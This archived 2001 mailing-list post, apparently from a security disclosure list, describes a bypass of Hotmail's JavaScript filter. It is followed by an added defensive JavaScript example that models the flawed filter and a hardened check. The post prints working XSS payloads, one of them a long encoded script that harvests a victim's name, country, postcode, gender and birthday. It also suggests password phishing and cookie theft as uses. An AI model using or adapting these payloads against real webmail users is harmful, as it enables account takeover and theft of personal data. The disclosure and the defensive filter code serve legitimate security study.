hotmail javascript bypass

From: ObLiviON (oblivat_private)
Date: Sat Oct 20 2001 - 06:53:37 PDT

    You can bypass the hotmail javascript filtering system using the
    <img>..</img> tag.
    
    Placing an <img src="javascript:bla" style="image-background:
    url('javascript: bla'); image-background:
    url('javascript:alert%28test%29')">
    
    The src="javascript:bla" is changed to src="javascript:Filtered()".
    The first image-background: url('javascript:bla') is changed to
    image-background: url(non-'javascript:bla') (so it isn't executed).
    
    But here is the problem: the second image-background:
    url('javascript:alert%28test%29') isn't changed at all.
    (The %28/%29 are used instead of '(' / ')', else it won't work.)
    
    So this code will be executed.
    
    Some things you can do with this bug:
    
    1. Redirect people to a fake hotmail-retype-your-password page and catch
    their password.
    2. Catching cookies/URLs etc.
    
    3. You can get the user's personal information.
    Example:
    - I used Netscape Messenger and inserted this HTML tag:
    
    --
    <IMG src="javascript:bla"
    style="background-image:url('javascript:alert%28%27bli%27%29');
    background-image:url('javascript:document.all[61].src=document.location.href.replace%28%22getmsg%22,%22person%22%29.substring%28%220%22,document.location.href.indexOf%28%22%26msg%22%29%29;function
    bla() { alert%28%22Name=%22 + window.frames[0].personalinfo.xfname.value
    + %22%20%22 + window.frames[0].personalinfo.xlname.value +
    %22\nCountry=%22 +
    window.frames[0].personalinfo.xcountry[window.frames[0].personalinfo.xcountry.selectedIndex].text
    + %22\nProvince=%22 +
    window.frames[0].personalinfo.xgeoid[window.frames[0].personalinfo.xgeoid.selectedIndex].text
    + %22\nPostalcode=%22 + window.frames[0].personalinfo.xzip.value +
    %22\nMale=%22 + window.frames[0].personalinfo.xgender[0].checked +
    %22\nFemale=%22 + window.frames[0].personalinfo.xgender[1].checked +
    %22\nBirthday=%22 + window.frames[0].personalinfo.day.value + %22%20%22
    +
    window.frames[0].personalinfo.month[window.frames[0].personalinfo.month.selectedIndex].text%29;
    };setTimeout%28%27bla()%27,4000%29;')">
    --
    
    Then send an email, and if the user opens this email a message will
    pop up containing his full name, country, etc. So you are able to catch
    this info.
    
    4. .....
    
    ObLiviON
    
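The weakness the post describes is a filter that rewrites only the first
url('javascript:...') in a style attribute while a browser honours every
declaration. The following is an added example, not code from the original
post or from Hotmail: naiveFilter() models the first-occurrence behaviour the
post reports, hardenedFilter() and countScriptUrls() show the defender-side
check that percent-decodes and inspects every url() and src value. SAMPLE_TAG
is constructed from the tag in the post; all function names are my own. The
normalisation goes slightly beyond the post's case by also catching
percent-encoded or whitespace-padded schemes such as java%09script:.

```javascript
// Added example (not from the original post). Constructed sample modelled on
// the tag in the post: a javascript: src plus two background-image urls.
const SAMPLE_TAG =
  '<img src="javascript:bla" style="background-image:url(\'javascript:bla\'); ' +
  'background-image:url(\'javascript:alert%28test%29\')">';

// Normalise a URL value before looking at its scheme: percent-decode,
// drop whitespace/control characters (browsers strip tab/newline from
// URLs), lower-case. Malformed escapes keep the raw string.
function normaliseUrl(raw) {
  let s = raw;
  try { s = decodeURIComponent(s); } catch (e) { /* keep raw on bad escapes */ }
  return s.replace(/[\s\x00-\x1f]/g, '').toLowerCase();
}

function isScriptUrl(raw) {
  return normaliseUrl(raw).startsWith('javascript:');
}

// Model of the filter described in the post: src= is rewritten to
// javascript:Filtered() and a NON-global regex neutralises only the first
// url('javascript:...'). Every later declaration passes through untouched.
function naiveFilter(tag) {
  return tag
    .replace(/src="javascript:[^"]*"/i, 'src="javascript:Filtered()"')
    .replace(/url\('javascript:/i, "url(non-'javascript:");
}

// Hardened variant: a script-scheme src is removed rather than rewritten,
// and every url(...) inside style= is decoded and checked; one hit drops the
// whole style attribute instead of patching a single occurrence.
function hardenedFilter(tag) {
  let out = tag.replace(/\ssrc="([^"]*)"/i, (m, url) =>
    isScriptUrl(url) ? '' : m);
  out = out.replace(/\sstyle="([^"]*)"/i, (m, css) => {
    const urlRe = /url\(\s*['"]?([^'")]*)['"]?\s*\)/gi;
    let hit;
    while ((hit = urlRe.exec(css)) !== null) {
      if (isScriptUrl(hit[1])) return ''; // drop the whole attribute
    }
    return m;
  });
  return out;
}

// Count script URLs that survive in a tag. Run this on the filter's OUTPUT:
// it is the regression check that would have caught the bypass. Note that
// javascript:Filtered() still carries the javascript: scheme and is counted.
function countScriptUrls(tag) {
  let n = 0;
  for (const m of tag.matchAll(/src="([^"]*)"/gi)) {
    if (isScriptUrl(m[1])) n++;
  }
  for (const m of tag.matchAll(/url\(\s*['"]?([^'")]*)['"]?\s*\)/gi)) {
    if (isScriptUrl(m[1])) n++;
  }
  return n;
}

console.log('input           :', countScriptUrls(SAMPLE_TAG), 'script URLs');
console.log('after naive     :', countScriptUrls(naiveFilter(SAMPLE_TAG)), 'script URLs');
console.log('after hardened  :', countScriptUrls(hardenedFilter(SAMPLE_TAG)), 'script URLs');
```

The point of the two filters side by side is the testing habit: the naive
filter "did something" to each kind of value and so looked correct on the
input it was written against, while counting script URLs in its output shows
two of the three surviving.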

    This archive was generated by hypermail 2b30 : Sat Oct 20 2001 - 11:05:08 PDT